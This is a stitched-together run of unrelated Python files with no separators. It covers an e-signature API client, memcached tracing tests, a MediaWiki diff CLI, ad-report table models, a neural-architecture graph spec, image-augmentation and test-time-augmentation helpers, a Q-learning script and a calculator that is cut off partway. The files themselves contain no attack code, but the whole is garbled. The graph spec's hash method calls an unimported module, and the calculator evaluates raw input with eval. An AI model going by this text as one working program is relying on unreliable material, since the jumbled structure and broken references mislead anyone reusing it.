EzsignfolderSendV1Response If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['pki_ezsignfolder_id'] = \ pki_ezsignfolder_id kwargs['ezsignfolder_send_v1_request'] = \ ezsignfolder_send_v1_request return self.ezsignfolder_send_v1_endpoint.call_with_http_info(**kwargs) def ezsignfolder_unsend_v1( self, pki_ezsignfolder_id, body, **kwargs ): """Unsend the Ezsignfolder # noqa: E501 Once an Ezsignfolder has been sent to signatories, it cannot be modified. 
Using this endpoint, you can unsend the Ezsignfolder and make it modifiable again. Signatories will receive an email informing them the signature process was aborted and they might receive a new invitation to sign. ⚠️ Warning: Any signature previously made by signatories on \"Non-completed\" Ezsigndocuments will be lost. # noqa: E501 This method makes a synchronous HTTP request by default. To make an asynchronous HTTP request, please pass async_req=True >>> thread = api.ezsignfolder_unsend_v1(pki_ezsignfolder_id, body, async_req=True) >>> result = thread.get() Args: pki_ezsignfolder_id (int): body (str): Keyword Args: _return_http_data_only (bool): response data without head status code and headers. Default is True. _preload_content (bool): if False, the urllib3.HTTPResponse object will be returned without reading/decoding response data. Default is True. _request_timeout (int/float/tuple): timeout setting for this request. If one number provided, it will be total request timeout. It can also be a pair (tuple) of (connection, read) timeouts. Default is None. _check_input_type (bool): specifies if type checking should be done one the data sent to the server. Default is True. _check_return_type (bool): specifies if type checking should be done one the data received from the server. Default is True. _content_type (str/None): force body content-type. Default is None and content-type will be predicted by allowed content-types and body. _host_index (int/None): specifies the index of the server that we want to use. Default is read from the configuration. async_req (bool): execute request asynchronously Returns: EzsignfolderUnsendV1Response If the method is called asynchronously, returns the request thread. """ kwargs['async_req'] = kwargs.get( 'async_req', False ) kwargs['_return_http_data_only'] = kwargs.get( '_return_http_data_only', True ) kwargs['_preload_content'] = kwargs.get( '_preload_content', True ) kwargs['_request_timeout'] = kwargs.get( '_request_timeout', None ) kwargs['_check_input_type'] = kwargs.get( '_check_input_type', True ) kwargs['_check_return_type'] = kwargs.get( '_check_return_type', True ) kwargs['_content_type'] = kwargs.get( '_content_type') kwargs['_host_index'] = kwargs.get('_host_index') kwargs['pki_ezsignfolder_id'] = \ pki_ezsignfolder_id kwargs['body'] = \ body return self.ezsignfolder_unsend_v1_endpoint.call_with_http_info(**kwargs) # stdlib import time from unittest.case import SkipTest # 3p import pylibmc # project from ddtrace import Pin from ddtrace.constants import ANALYTICS_SAMPLE_RATE_KEY from ddtrace.contrib.pylibmc import TracedClient from ddtrace.contrib.pylibmc.patch import patch, unpatch from ddtrace.ext import memcached # testing from ...opentracer.utils import init_tracer from ...contrib.config import MEMCACHED_CONFIG as cfg from ...base import BaseTracerTestCase class PylibmcCore(object): """Core of the test suite for pylibmc Shared tests between the patch and TracedClient interface. Will be merge back to a single class once the TracedClient is deprecated. """ TEST_SERVICE = memcached.SERVICE def get_client(self): # Implement me pass def test_upgrade(self): raise SkipTest('upgrade memcached') # add tests for touch, cas, gets etc def test_append_prepend(self): client, tracer = self.get_client() # test start = time.time() client.set('a', 'crow') client.prepend('a', 'holy ') client.append('a', '!') # FIXME[matt] there is a bug in pylibmc & python 3 (perhaps with just # some versions of the libmemcache?) where append/prepend are replaced # with get. 
our traced versions do the right thing, so skipping this # test. try: assert client.get('a') == 'holy crow!' except AssertionError: pass end = time.time() # verify spans spans = tracer.writer.pop() for s in spans: self._verify_cache_span(s, start, end) expected_resources = sorted(['append', 'prepend', 'get', 'set']) resources = sorted(s.resource for s in spans) assert expected_resources == resources def test_incr_decr(self): client, tracer = self.get_client() # test start = time.time() client.set('a', 1) client.incr('a', 2) client.decr('a', 1) v = client.get('a') assert v == 2 end = time.time() # verify spans spans = tracer.writer.pop() for s in spans: self._verify_cache_span(s, start, end) expected_resources = sorted(['get', 'set', 'incr', 'decr']) resources = sorted(s.resource for s in spans) assert expected_resources == resources def test_incr_decr_ot(self): """OpenTracing version of test_incr_decr.""" client, tracer = self.get_client() ot_tracer = init_tracer('memcached', tracer) start = time.time() with ot_tracer.start_active_span('mc_ops'): client.set('a', 1) client.incr('a', 2) client.decr('a', 1) v = client.get('a') assert v == 2 end = time.time() # verify spans spans = tracer.writer.pop() ot_span = spans[0] assert ot_span.name == 'mc_ops' for s in spans[1:]: assert s.parent_id == ot_span.span_id self._verify_cache_span(s, start, end) expected_resources = sorted(['get', 'set', 'incr', 'decr']) resources = sorted(s.resource for s in spans[1:]) assert expected_resources == resources def test_clone(self): # ensure cloned connections are traced as well. client, tracer = self.get_client() cloned = client.clone() start = time.time() cloned.get('a') end = time.time() spans = tracer.writer.pop() for s in spans: self._verify_cache_span(s, start, end) expected_resources = ['get'] resources = sorted(s.resource for s in spans) assert expected_resources == resources def test_get_set_multi(self): client, tracer = self.get_client() # test start = time.time() client.set_multi({'a': 1, 'b': 2}) out = client.get_multi(['a', 'c']) assert out == {'a': 1} client.delete_multi(['a', 'c']) end = time.time() # verify spans = tracer.writer.pop() for s in spans: self._verify_cache_span(s, start, end) expected_resources = sorted(['get_multi', 'set_multi', 'delete_multi']) resources = sorted(s.resource for s in spans) assert expected_resources == resources def test_get_set_multi_prefix(self): client, tracer = self.get_client() # test start = time.time() client.set_multi({'a': 1, 'b': 2}, key_prefix='foo') out = client.get_multi(['a', 'c'], key_prefix='foo') assert out == {'a': 1} client.delete_multi(['a', 'c'], key_prefix='foo') end = time.time() # verify spans = tracer.writer.pop() for s in spans: self._verify_cache_span(s, start, end) assert s.get_tag('memcached.query') == '%s foo' % s.resource expected_resources = sorted(['get_multi', 'set_multi', 'delete_multi']) resources = sorted(s.resource for s in spans) assert expected_resources == resources def test_get_set_delete(self): client, tracer = self.get_client() # test k = u'cafe' v = 'val-foo' start = time.time() client.delete(k) # just in case out = client.get(k) assert out is None, out client.set(k, v) out = client.get(k) assert out == v end = time.time() # verify spans = tracer.writer.pop() for s in spans: self._verify_cache_span(s, start, end) assert s.get_tag('memcached.query') == '%s %s' % (s.resource, k) expected_resources = sorted(['get', 'get', 'delete', 'set']) resources = sorted(s.resource for s in spans) assert expected_resources == resources 
def _verify_cache_span(self, s, start, end): assert s.start > start assert s.start + s.duration < end assert s.service == self.TEST_SERVICE assert s.span_type == 'cache' assert s.name == 'memcached.cmd' assert s.get_tag('out.host') == cfg['host'] assert s.get_metric('out.port') == cfg['port'] def test_analytics_default(self): client, tracer = self.get_client() client.set('a', 'crow') spans = self.get_spans() self.assertEqual(len(spans), 1) self.assertIsNone(spans[0].get_metric(ANALYTICS_SAMPLE_RATE_KEY)) def test_analytics_with_rate(self): with self.override_config( 'pylibmc', dict(analytics_enabled=True, analytics_sample_rate=0.5) ): client, tracer = self.get_client() client.set('a', 'crow') spans = self.get_spans() self.assertEqual(len(spans), 1) self.assertEqual(spans[0].get_metric(ANALYTICS_SAMPLE_RATE_KEY), 0.5) def test_analytics_without_rate(self): with self.override_config( 'pylibmc', dict(analytics_enabled=True) ): client, tracer = self.get_client() client.set('a', 'crow') spans = self.get_spans() self.assertEqual(len(spans), 1) self.assertEqual(spans[0].get_metric(ANALYTICS_SAMPLE_RATE_KEY), 1.0) def test_disabled(self): """ Ensure client works when the tracer is disabled """ client, tracer = self.get_client() try: tracer.enabled = False client.set('a', 'crow') spans = self.get_spans() assert len(spans) == 0 finally: tracer.enabled = True class TestPylibmcLegacy(BaseTracerTestCase, PylibmcCore): """Test suite for the tracing of pylibmc with the legacy TracedClient interface""" TEST_SERVICE = 'mc-legacy' def get_client(self): url = '%s:%s' % (cfg['host'], cfg['port']) raw_client = pylibmc.Client([url]) raw_client.flush_all() client = TracedClient(raw_client, tracer=self.tracer, service=self.TEST_SERVICE) return client, self.tracer class TestPylibmcPatchDefault(BaseTracerTestCase, PylibmcCore): """Test suite for the tracing of pylibmc with the default lib patching""" def setUp(self): super(TestPylibmcPatchDefault, self).setUp() patch() def tearDown(self): unpatch() super(TestPylibmcPatchDefault, self).tearDown() def get_client(self): url = '%s:%s' % (cfg['host'], cfg['port']) client = pylibmc.Client([url]) client.flush_all() Pin.get_from(client).clone(tracer=self.tracer).onto(client) return client, self.tracer class TestPylibmcPatch(TestPylibmcPatchDefault): """Test suite for the tracing of pylibmc with a configured lib patching""" TEST_SERVICE = 'mc-custom-patch' def get_client(self): client, tracer = TestPylibmcPatchDefault.get_client(self) Pin.get_from(client).clone(service=self.TEST_SERVICE).onto(client) return client, tracer def test_patch_unpatch(self): url = '%s:%s' % (cfg['host'], cfg['port']) # Test patch idempotence patch() patch() client = pylibmc.Client([url]) Pin.get_from(client).clone( service=self.TEST_SERVICE, tracer=self.tracer).onto(client) client.set('a', 1) spans = self.tracer.writer.pop() assert spans, spans assert len(spans) == 1 # Test unpatch unpatch() client = pylibmc.Client([url]) client.set('a', 1) spans = self.tracer.writer.pop() assert not spans, spans # Test patch again patch() client = pylibmc.Client([url]) Pin(service=self.TEST_SERVICE, tracer=self.tracer).onto(client) client.set('a', 1) spans = self.tracer.writer.pop() assert spans, spans assert len(spans) == 1 1-10 r""" ``$ mwdiffs dump2diffs -h`` :: Computes diffs from an XML dump. Usage: dump2diffs (-h|--help) dump2diffs [...] 
--config= [--namespaces=] [--timeout=] [--keep-text] [--threads=] [--output=] [--compress=] [--verbose] [--debug] Options: -h|--help Print this documentation The path to a MediaWiki XML Dump file [default: ] --config= The path to a deltas DiffEngine configuration --namespaces= A comma separated list of namespace IDs to be considered [default: ] --timeout= The maximum number of seconds that a diff will be able to run before being stopped [default: 10] --keep-text If set, the 'text' field will not be dropped after diffs are computed. --threads= If a collection of files are provided, how many processor threads? [default: ] --output= Write output to a directory with one output file per input path. [default: ] --compress= If set, output written to the output-dir will be compressed in this format. [default: bz2] --verbose Print progress information to stderr. --debug Prints debug logs to stder. """ import logging import mwcli import mwxml import mwxml.utilities from .revdocs2diffs import drop_text, process_args, revdocs2diffs logger = logging.getLogger(__name__) def _dump2diffs(*args, keep_text=False, **kwargs): keep_text = bool(keep_text) docs = dump2diffs(*args, **kwargs) if not keep_text: docs = drop_text(docs) yield from docs def dump2diffs(dump, *args, **kwargs): """ Generates a sequence of revision JSON documents containing a 'diff' field that represents the change to the text between revisions. :Parameters: dump : :class:`mwxml.Dump` An XML dump to process diff_engine : :class:`deltas.DiffEngine` A configured diff engine for comparing revisions namespaces : `set` ( `int` ) A set of namespace IDs that will be processed. If left unspecified, all namespaces will be processed. timeout : `float` The maximum time in seconds that a difference detection operation should be allowed to consume. This is used to handle extremely computationally complex diffs that occur from time to time. When a diff takes longer than this many seconds, a trivial diff will be reported (remove all the tokens and add them back) and the 'timedout' field will be set to True verbose : `bool` Print dots and stuff to stderr """ rev_docs = mwxml.utilities.dump2revdocs(dump) return revdocs2diffs(rev_docs, *args, **kwargs) streamer = mwcli.Streamer( __doc__, __name__, _dump2diffs, process_args, file_reader=mwxml.Dump.from_file ) main = streamer.main models/model_tiktok.py import sqlalchemy as alchemy from . 
import base from typing import Optional class TikTokReportTableModel(base.ReportTableModel): @property def date_format_string(self) -> Optional[str]: return '%Y-%m-%d %H:%M:%S' def define_table(self): alchemy.Table( self.table_name, self.declarative_base.metadata, alchemy.Column(self.date_column_name, alchemy.Date), alchemy.Column(self.crystallized_column_name, alchemy.Boolean), alchemy.Column('advertiser_id', alchemy.Text), schema=self.schema_name ) class TikTokCampaignReportTableModel(TikTokReportTableModel): @property def date_column_name(self) -> str: return 'campaign_stat_datetime' @property def table_name(self) -> str: return base.ReportTaskType.fetch_tiktok_campaigns.value class TikTokAdGroupReportTableModel(TikTokReportTableModel): @property def date_column_name(self) -> str: return 'adgroup_stat_datetime' @property def table_name(self) -> str: return base.ReportTaskType.fetch_tiktok_adgroups.value class TikTokAdReportTableModel(TikTokReportTableModel): @property def date_column_name(self) -> str: return 'ad_stat_datetime' @property def table_name(self) -> str: return base.ReportTaskType.fetch_tiktok_ads.value # class TikTokAdGroupReportTableModel(TikTokReportTableModel): # @property # def table_name(self) -> str: # return base.ReportTaskType.fetch_snapchat_adsquads.value # class TikTokAdReportTableModel(TikTokReportTableModel): # @property # def table_name(self) -> str: # return base.ReportTaskType.fetch_snapchat_ads.value# Copyright 2021 Samsung Electronics Co., Ltd. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # http://www.apache.org/licenses/LICENSE-2.0 # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # ============================================================================= """Model specification for module connectivity individuals. This module handles pruning the unused parts of the computation graph but should avoid creating any TensorFlow models (this is done inside model_builder.py). """ from __future__ import absolute_import from __future__ import division from __future__ import print_function import copy import hashlib import itertools import numpy as np # Graphviz is optional and only required for visualization. try: import graphviz # pylint: disable=g-import-not-at-top except ImportError: pass def _ToModelSpec(mat, ops): return ModelSpec(mat, ops) def gen_is_edge_fn(bits): """Generate a boolean function for the edge connectivity. Given a bitstring FEDCBA and a 4x4 matrix, the generated matrix is [[0, A, B, D], [0, 0, C, E], [0, 0, 0, F], [0, 0, 0, 0]] Note that this function is agnostic to the actual matrix dimension due to order in which elements are filled out (column-major, starting from least significant bit). For example, the same FEDCBA bitstring (0-padded) on a 5x5 matrix is [[0, A, B, D, 0], [0, 0, C, E, 0], [0, 0, 0, F, 0], [0, 0, 0, 0, 0], [0, 0, 0, 0, 0]] Args: bits: integer which will be interpreted as a bit mask. Returns: vectorized function that returns True when an edge is present. 
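For example (following the FEDCBA convention above), gen_is_edge_fn(0b000011) returns a function for which is_edge(0, 1) and is_edge(0, 2) are true (bits A and B) and every other vertex pair has no edge.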
""" def is_edge(x, y): """Is there an edge from x to y (0-indexed)?""" if x >= y: return 0 # Map x, y to index into bit string index = x + (y * (y - 1) // 2) return (bits >> index) % 2 == 1 return np.vectorize(is_edge) def is_full_dag(matrix): """Full DAG == all vertices on a path from vert 0 to (V-1). i.e. no disconnected or "hanging" vertices. It is sufficient to check for: 1) no rows of 0 except for row V-1 (only output vertex has no out-edges) 2) no cols of 0 except for col 0 (only input vertex has no in-edges) Args: matrix: V x V upper-triangular adjacency matrix Returns: True if the there are no dangling vertices. """ shape = np.shape(matrix) rows = matrix[:shape[0]-1, :] == 0 rows = np.all(rows, axis=1) # Any row with all 0 will be True rows_bad = np.any(rows) cols = matrix[:, 1:] == 0 cols = np.all(cols, axis=0) # Any col with all 0 will be True cols_bad = np.any(cols) return (not rows_bad) and (not cols_bad) def num_edges(matrix): """Computes number of edges in adjacency matrix.""" return np.sum(matrix) def hash_module(matrix, labeling): """Computes a graph-invariance MD5 hash of the matrix and label pair. Args: matrix: np.ndarray square upper-triangular adjacency matrix. labeling: list of int labels of length equal to both dimensions of matrix. Returns: MD5 hash of the matrix and labeling. """ vertices = np.shape(matrix)[0] in_edges = np.sum(matrix, axis=0).tolist() out_edges = np.sum(matrix, axis=1).tolist() assert len(in_edges) == len(out_edges) == len(labeling) hashes = list(zip(out_edges, in_edges, labeling)) hashes = [hashlib.md5(str(h).encode('utf-8')).hexdigest() for h in hashes] # Computing this up to the diameter is probably sufficient but since the # operation is fast, it is okay to repeat more times. for _ in range(vertices): new_hashes = [] for v in range(vertices): in_neighbors = [hashes[w] for w in range(vertices) if matrix[w, v]] out_neighbors = [hashes[w] for w in range(vertices) if matrix[v, w]] new_hashes.append(hashlib.md5( (''.join(sorted(in_neighbors)) + '|' + ''.join(sorted(out_neighbors)) + '|' + hashes[v]).encode('utf-8')).hexdigest()) hashes = new_hashes fingerprint = hashlib.md5(str(sorted(hashes)).encode('utf-8')).hexdigest() return fingerprint def permute_graph(graph, label, permutation): """Permutes the graph and labels based on permutation. Args: graph: np.ndarray adjacency matrix. label: list of labels of same length as graph dimensions. permutation: a permutation list of ints of same length as graph dimensions. Returns: np.ndarray where vertex permutation[v] is vertex v from the original graph """ # vertex permutation[v] in new graph is vertex v in the old graph forward_perm = zip(permutation, list(range(len(permutation)))) inverse_perm = [x[1] for x in sorted(forward_perm)] edge_fn = lambda x, y: graph[inverse_perm[x], inverse_perm[y]] == 1 new_matrix = np.fromfunction(np.vectorize(edge_fn), (len(label), len(label)), dtype=np.int8) new_label = [label[inverse_perm[i]] for i in range(len(label))] return new_matrix, new_label def is_isomorphic(graph1, graph2): """Exhaustively checks if 2 graphs are isomorphic.""" matrix1, label1 = np.array(graph1[0]), graph1[1] matrix2, label2 = np.array(graph2[0]), graph2[1] assert np.shape(matrix1) == np.shape(matrix2) assert len(label1) == len(label2) vertices = np.shape(matrix1)[0] # Note: input and output in our constrained graphs always map to themselves # but this script does not enforce that. 
for perm in itertools.permutations(range(0, vertices)): pmatrix1, plabel1 = permute_graph(matrix1, label1, perm) if np.array_equal(pmatrix1, matrix2) and plabel1 == label2: return True return False class ModelSpec(object): """Model specification given adjacency matrix and labeling.""" def __init__(self, matrix, ops, data_format='channels_last'): """Initialize the module spec. Args: matrix: ndarray or nested list with shape [V, V] for the adjacency matrix. ops: V-length list of labels for the base ops used. The first and last elements are ignored because they are the input and output vertices which have no operations. The elements are retained to keep consistent indexing. data_format: channels_last or channels_first. Raises: ValueError: invalid matrix or ops """ if not isinstance(matrix, np.ndarray): matrix = np.array(matrix) shape = np.shape(matrix) if len(shape) != 2 or shape[0] != shape[1]: raise ValueError('matrix must be square') if shape[0] != len(ops): raise ValueError('length of ops must match matrix dimensions') if not is_upper_triangular(matrix): raise ValueError('matrix must be upper triangular') # Both the original and pruned matrices are deep copies of the matrix and # ops so any changes to those after initialization are not recognized by the # spec. self.original_matrix = copy.deepcopy(matrix) self.original_ops = copy.deepcopy(ops) self.matrix = copy.deepcopy(matrix) self.ops = copy.deepcopy(ops) self.valid_spec = True self._prune() self.data_format = data_format def _prune(self): """Prune the extraneous parts of the graph. General procedure: 1) Remove parts of graph not connected to input. 2) Remove parts of graph not connected to output. 3) Reorder the vertices so that they are consecutive after steps 1 and 2. These 3 steps can be combined by deleting the rows and columns of the vertices that are not reachable from both the input and output (in reverse). """ num_vertices = np.shape(self.original_matrix)[0] # DFS forward from input visited_from_input = set([0]) frontier = [0] while frontier: top = frontier.pop() for v in range(top + 1, num_vertices): if self.original_matrix[top, v] and v not in visited_from_input: visited_from_input.add(v) frontier.append(v) # DFS backward from output visited_from_output = set([num_vertices - 1]) frontier = [num_vertices - 1] while frontier: top = frontier.pop() for v in range(0, top): if self.original_matrix[v, top] and v not in visited_from_output: visited_from_output.add(v) frontier.append(v) # Any vertex that isn't connected to both input and output is extraneous to # the computation graph. extraneous = set(range(num_vertices)).difference( visited_from_input.intersection(visited_from_output)) # If the non-extraneous graph is less than 2 vertices, the input is not # connected to the output and the spec is invalid. if len(extraneous) > num_vertices - 2: self.matrix = None self.ops = None self.valid_spec = False return self.matrix = np.delete(self.matrix, list(extraneous), axis=0) self.matrix = np.delete(self.matrix, list(extraneous), axis=1) for index in sorted(extraneous, reverse=True): del self.ops[index] def hash_spec(self, canonical_ops): """Computes the isomorphism-invariant graph hash of this spec. Args: canonical_ops: list of operations in the canonical ordering which they were assigned (i.e. the order provided in the config['available_ops']). Returns: MD5 hash of this spec which can be used to query the dataset. """ # Invert the operations back to integer label indices used in graph gen. 
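# The input and output vertices get the sentinel labels -1 and -2 so they can never collide with the indices of real operations.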
labeling = [-1] + [canonical_ops.index(op) for op in self.ops[1:-1]] + [-2] return graph_util.hash_module(self.matrix, labeling) def visualize(self): """Creates a dot graph. Can be visualized in colab directly.""" num_vertices = np.shape(self.matrix)[0] g = graphviz.Digraph() g.node(str(0), 'input') for v in range(1, num_vertices - 1): g.node(str(v), self.ops[v]) g.node(str(num_vertices - 1), 'output') for src in range(num_vertices - 1): for dst in range(src + 1, num_vertices): if self.matrix[src, dst]: g.edge(str(src), str(dst)) return g def is_upper_triangular(matrix): """True if matrix is 0 on diagonal and below.""" for src in range(np.shape(matrix)[0]): for dst in range(0, src + 1): if matrix[src, dst] != 0: return False return True""" Slightly modified version of: https://github.com/pytorch/vision/blob/master/torchvision/transforms/transforms.py """ import numbers import random import vel.api.data as data class RandomCrop(data.Augmentation): """Crop the given PIL Image at a random location. Args: size (sequence or int): Desired output size of the crop. If size is an int instead of sequence like (h, w), a square crop (size, size) is made. padding (int or sequence, optional): Optional padding on each border of the image. Default is 0, i.e no padding. If a sequence of length 4 is provided, it is used to pad left, top, right, bottom borders respectively. pad_if_needed (boolean): It will pad the image if smaller than the desired size to avoid raising an exception. """ def __init__(self, size, padding=0, padding_mode='constant', pad_if_needed=False, mode='x', tags=None): super().__init__(mode, tags) if isinstance(size, numbers.Number): self.size = (int(size), int(size)) else: self.size = size self.padding = padding self.padding_mode = padding_mode self.padding_mode_cv = data.mode_to_cv2(self.padding_mode) self.pad_if_needed = pad_if_needed @staticmethod def get_params(img, output_size): """Get parameters for ``crop`` for a random crop. Args: img (PIL Image): Image to be cropped. output_size (tuple): Expected output size of the crop. Returns: tuple: params (i, j, h, w) to be passed to ``crop`` for random crop. """ w, h, *_ = img.shape th, tw = output_size if w == tw and h == th: return 0, 0, h, w i = random.randint(0, h - th) j = random.randint(0, w - tw) return i, j, th, tw def __call__(self, img): """ Args: img (PIL Image): Image to be cropped. Returns: PIL Image: Cropped image. 
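A usage sketch (sizes and padding are illustrative): aug = RandomCrop((32, 32), padding=4); cropped = aug(img) pads the image according to ``padding`` and returns a random 32x32 crop; the create(width, height, ...) factory below builds the same transform.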
""" if self.padding > 0: img = data.pad(img, self.padding, mode=self.padding_mode_cv) # pad the width if needed if self.pad_if_needed and img.size[0] < self.size[1]: img = data.pad(img, (int((1 + self.size[1] - img.size[0]) / 2), 0), mode=self.padding_mode_cv) # pad the height if needed if self.pad_if_needed and img.size[1] < self.size[0]: img = data.pad(img, (0, int((1 + self.size[0] - img.size[1]) / 2)), mode=self.padding_mode_cv) i, j, h, w = self.get_params(img, self.size) return data.crop(img, j, i, w, h) def __repr__(self): return self.__class__.__name__ + '(size={0}, padding={1})'.format(self.size, self.padding) def create(width, height, padding=0, padding_mode='constant', mode='x', tags=None): return RandomCrop(size=(width, height), padding=padding, padding_mode=padding_mode, mode=mode, tags=tags) from functools import partial import torch import torch.nn.functional as F from pytorch_toolbelt.datasets import INPUT_IMAGE_KEY from pytorch_toolbelt.inference.tta import ( _deaugment_averaging, fliplr_image_augment, fliplr_image_deaugment, fliplr_labels_deaugment, fliplr_labels_augment, ) from torch import Tensor from geopose.dataset import ( INPUT_GROUND_SAMPLE_DISTANCE, OUTPUT_VFLOW_SCALE, OUTPUT_VFLOW_DIRECTION, OUTPUT_AGL_MASK, ) from .geopose_tta import GeoposeTTAModel def geopose_model_fliplr_tta(model, agl_reduction="mean"): return GeoposeTTAModel( model, augment_fn={INPUT_IMAGE_KEY: fliplr_image_augment, INPUT_GROUND_SAMPLE_DISTANCE: fliplr_labels_augment}, deaugment_fn={ OUTPUT_VFLOW_SCALE: fliplr_labels_deaugment, OUTPUT_VFLOW_DIRECTION: fliplr_direction_deaugment, OUTPUT_AGL_MASK: partial(fliplr_image_deaugment, reduction=agl_reduction), }, ) def fliplr_direction_deaugment(direction: Tensor, reduction="mean") -> Tensor: """ Deaugment input tensor (output of the model) assuming the input was D4-augmented image (See d4_augment). Args: direction: Tensor of [B * 2, 2] shape reduction: If True performs averaging of 2 outputs, otherwise - summation. Returns: Tensor of [B, 2] shape if reduction is not None or "none", otherwise returns de-augmented tensor of [2, B, 2] shape """ if direction.size(0) % 2 != 0: raise RuntimeError("Batch size must be divisible by 2") b1, b2 = torch.chunk(direction, 2) fliplr = torch.tensor([[-1, +1]], dtype=direction.dtype, device=direction.device) x: Tensor = torch.stack( [F.normalize(b1), F.normalize(b2 * fliplr),] ) return _deaugment_averaging(x, reduction=reduction) # -*- coding: utf-8 -*- """Material used to generate and execute bindings generated by the PyXB package. """ # Automatically include all the stuff that's necessary for basic # running. There are order dependencies here. from . import basis from . import datatypes from . import facets from . 
# -*- coding: utf-8 -*-
"""Material used to generate and execute bindings generated by the PyXB
package.
"""

# Automatically include all the stuff that's necessary for basic
# running. There are order dependencies here.
from . import basis
from . import datatypes
from . import facets
from . import content

# Do not include the stuff that's required only for code generation
# noimport generate


# Reinforcement learning/approx_q.py
# Build a neural network for approximate Q learning

import gym
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
import keras
import keras.layers as L


def get_action(state, epsilon=0):
    """
    Sample actions with epsilon-greedy policy.

    Recap: with p = epsilon pick a random action, else pick the action with highest Q(s,a).
    """
    q_values = network.predict(state[None])[0]

    exploration = np.random.random()
    if exploration < epsilon:
        action = np.random.choice(n_actions, 1)[0]
    else:
        action = np.argmax(q_values)

    return action


def generate_session(t_max=1000, epsilon=0, train=False):
    """Play env with the approximate q-learning agent and train it at the same time."""
    total_reward = 0
    s = env.reset()

    for t in range(t_max):
        a = get_action(s, epsilon=epsilon)
        next_s, r, done, _ = env.step(a)

        if train:
            sess.run(train_step, {
                states_ph: [s], actions_ph: [a], rewards_ph: [r],
                next_states_ph: [next_s], is_done_ph: [done]
            })

        total_reward += r
        s = next_s
        if done:
            break

    return total_reward


if __name__ == "__main__":
    # OpenAI gym CartPole-v0 example
    env = gym.make("CartPole-v0").env
    env.reset()
    n_actions = env.action_space.n
    state_dim = env.observation_space.shape

    tf.reset_default_graph()
    sess = tf.InteractiveSession()
    keras.backend.set_session(sess)

    network = keras.models.Sequential()
    network.add(L.InputLayer(state_dim))

    # create a network for approximate q-learning following guidelines above
    network.add(L.Dense(100, activation='relu'))
    network.add(L.Dense(100, activation='relu'))
    network.add(L.Dense(n_actions, activation='linear'))

    # Q-learning via gradient descent - train the agent's Q-function by minimizing the TD loss.
    # Create placeholders for the <s, a, r, s'> tuple and a special indicator for game end (is_done = True).
    states_ph = keras.backend.placeholder(dtype='float32', shape=(None,) + state_dim)
    actions_ph = keras.backend.placeholder(dtype='int32', shape=[None])
    rewards_ph = keras.backend.placeholder(dtype='float32', shape=[None])
    next_states_ph = keras.backend.placeholder(dtype='float32', shape=(None,) + state_dim)
    is_done_ph = keras.backend.placeholder(dtype='bool', shape=[None])

    # get q-values for all actions in current states
    predicted_qvalues = network(states_ph)

    # select q-values for chosen actions
    predicted_qvalues_for_actions = tf.reduce_sum(predicted_qvalues * tf.one_hot(actions_ph, n_actions), axis=1)

    gamma = 0.99

    # compute q-values for all actions in next states
    predicted_next_qvalues = network(next_states_ph)

    # compute V*(next_states) using predicted next q-values
    next_state_values = tf.reduce_max(predicted_next_qvalues, axis=1)
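    # A worked numpy sketch of the one-step Q-learning target computed below:
    # target = r + gamma * max_a' Q(s', a'), with the bootstrap term dropped on
    # terminal transitions. The numbers are arbitrary and serve only to make the
    # formula concrete; they are independent of the TensorFlow graph built here.
    _r = np.array([1.0, 1.0])
    _done = np.array([False, True])
    _q_next = np.array([[0.5, 2.0, 1.0],
                        [0.3, 0.1, 0.2]])
    _target = _r + gamma * _q_next.max(axis=1)   # [1 + 0.99 * 2.0, 1 + 0.99 * 0.3]
    _target = np.where(_done, _r, _target)       # terminal transition keeps just r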
    # compute "target q-values" for loss - it's what's inside the square parentheses in the formula above
    target_qvalues_for_actions = rewards_ph + gamma * next_state_values

    # at the last state use the simplified formula: Q(s,a) = r(s,a) since s' doesn't exist
    target_qvalues_for_actions = tf.where(is_done_ph, rewards_ph, target_qvalues_for_actions)

    # mean squared error loss to minimize
    loss = (predicted_qvalues_for_actions - tf.stop_gradient(target_qvalues_for_actions)) ** 2
    loss = tf.reduce_mean(loss)

    # training function that resembles agent.update(state, action, reward, next_state) from the tabular agent
    train_step = tf.train.AdamOptimizer(1e-4).minimize(loss)

    epsilon = 0.5

    for i in range(1000):
        session_rewards = [generate_session(epsilon=epsilon, train=True) for _ in range(100)]
        print("epoch #{}\tmean reward = {:.3f}\tepsilon = {:.3f}".format(i, np.mean(session_rewards), epsilon))

        epsilon *= 0.99
        assert epsilon >= 1e-4, "Make sure epsilon is always nonzero during training"

        if np.mean(session_rewards) > 300:
            print("Iteration ended, session mean reward > 300")
            break


from tkinter import *
import parser

w = 5       # width of button
h = 2       # height of button
border = 0  # border of button

root = Tk()
root.title('Calculator')

print('History of operations:')

# get user input to text field
i = 0


def get_variables(num):
    global i
    display.insert(i, num)
    i += 1


# get user inputs of operations
def get_operation(operator):
    global i
    op_len = len(operator)
    display.insert(i, operator)
    i += op_len


# resets to normal display
def reset():
    display.config(bg='White', fg='Black')


# clear screen
def clearAll():
    display.delete(0, END)


# backspace
def delete():
    disp_str = display.get()
    clearAll()
    display.insert(0, disp_str[:-1])
    # OR display.delete(len(disp_str) - 1, END)


# calculate sequence
def answer():
    string = display.get()
    result = 'Error'
    try:
        a = parser.expr(string).compile()
        result = eval(a)
        clearAll()
        display.config(bg='Green', fg='White')
        display.insert(0, result)
        display.after(300, reset)
    except Exception:
        clearAll()
        display.config(bg='Red', fg='White')
        display.insert(0, 'Error')
        display.after(300, reset)
    print(string + ' = ' + str(result))


# adding input field
display = Entry(root)
display.grid(row=1, columnspan=6, sticky=W + E)
root.bind('<Return>', lambda _: answer())  # enter to calculate answer

# adding number buttons
Button(root, text='1', width=w, command=lambda: get_variables(1), bd=border, height=h).grid(row=2, column=0)
Button(root, text='2', width=w, command=lambda: get_variables(2), bd=border, height=h).grid(row=2, column=1)
